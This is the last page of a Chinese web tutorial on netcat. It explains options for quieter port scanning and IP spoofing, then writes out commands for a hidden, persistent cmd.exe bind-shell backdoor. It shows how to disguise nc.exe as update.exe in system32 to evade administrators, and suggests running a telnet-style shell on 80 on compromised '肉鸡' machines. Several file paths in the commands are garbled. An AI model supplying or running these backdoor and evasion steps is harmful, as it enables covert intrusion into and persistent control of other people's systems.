WEB开发网
开发学院网络安全安全技术 网络安全中“瑞士军刀” nc 阅读

网络安全中“瑞士军刀” nc

 2008-01-06 13:10:19 来源:WEB开发网   
核心提示: -r 该参数使nc可以随机选择本地和远程端口,当使用nc在系统中范围很大的一批端口上获取信息时,网络安全中“瑞士军刀” nc(3),要想混合源端口和目标端口的顺序看起来不怎么象端口扫描,这个选项是很有用的,当有人连接的时候,就让cmd.exe以telnet的形式应答,当这个选项与-i选项和

-r 该参数使nc可以随机选择本地和远程端口。当使用nc在系统中范围很大的一批端口上获取信息时,要想混合源端口和目标端口的顺序看起来不怎么象端口扫描,这个选项是很有用的。当这个选项与-i选项和一个足够大的间隔结合使用的时候,在不被注意的端口扫描成功几率能得到很大提升。

-s 指定nc建立连接时所使用的ip地址,该选项允许黑客做一些工作,它允许黑客隐藏他们的ip地址或假冒他人的ip地址,但是要得到路由到他们所欺骗的地址的任何信息,都需要使用-g源路由选项。其次,当处于监听模式时,大多数情况下都可以与一个已经监听的服务“预先绑定”,所有tcp和udp服务都绑定到某个端口。

-t 如果使用telnet选项编译,nc就可以与telnet服务器进行telnet选项协商,虽然它的响应是毫无意义的信息,但可以通过该状态看到连接23端口的信息。

-u nc使用udp而非tcp,在客户模式和监听模式下都起作用。

-v 控制nc将要做的事情达到的程度,如使用nc -v,那么nc将仅吐出它所接收到的数据,一个单独的-v可以知道它连接或绑定的地址是否有问题发生,第2个-v可以让nc在一个连接结束的时候让你知道这个连接总共发送和接收了多少数据。

-w控制在一个连接上nc放弃之前等待的时间。同时也告诉nc当在标准输入上接收到一个eof(end-of-file)之后应该等待多长时间来关闭连接并退出。如果你通过nc向远程服务器发送命令并且期望大量的数据返回(例如:向一台web服务器发送一个http命令以下载一个大文件),该选项是很有用的。

nc的具体使用

c: c.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个netcat后门。

c: c.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用netcat重新返回系统,直到系统管理员在任务管理器中看见nc.exe在运行,从而发现这个后门,我们一样可以把它做的更加隐蔽,

c:move nc.exe c:windowssystem32Driversupdate.exe

c:windowssysteme32driversupdate.exe -p 4455 -d -L -e cmd.exe

系统管理员可能把特权附属于一些无害的程序,如update.exe等,黑客也可以隐藏命令行。

c:windowssystme32driversupdate.exe

cmd line: -l -p 4455 -d -L -e cmd.exe

c:>

nc -l - p 80 监听80端口

nc -l -p 80 >c:log.dat 监听80端口,并把信息记录到log.dat中

nc -v -l -p 80 监听80端口,并显示端口信息

nc -vv -l -p 80 监听80端口,显示更详细的端口信息

nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向到80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。

nc -v ip port 扫瞄某ip的某个端口

nc -v -z ip port-port扫描某ip的端口到某端口

nc -v -z -u ip port-port扫描某ip的某udp端口到某udp端口

上一页  1 2 3 

Tags:网络安全 瑞士军刀 nc

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接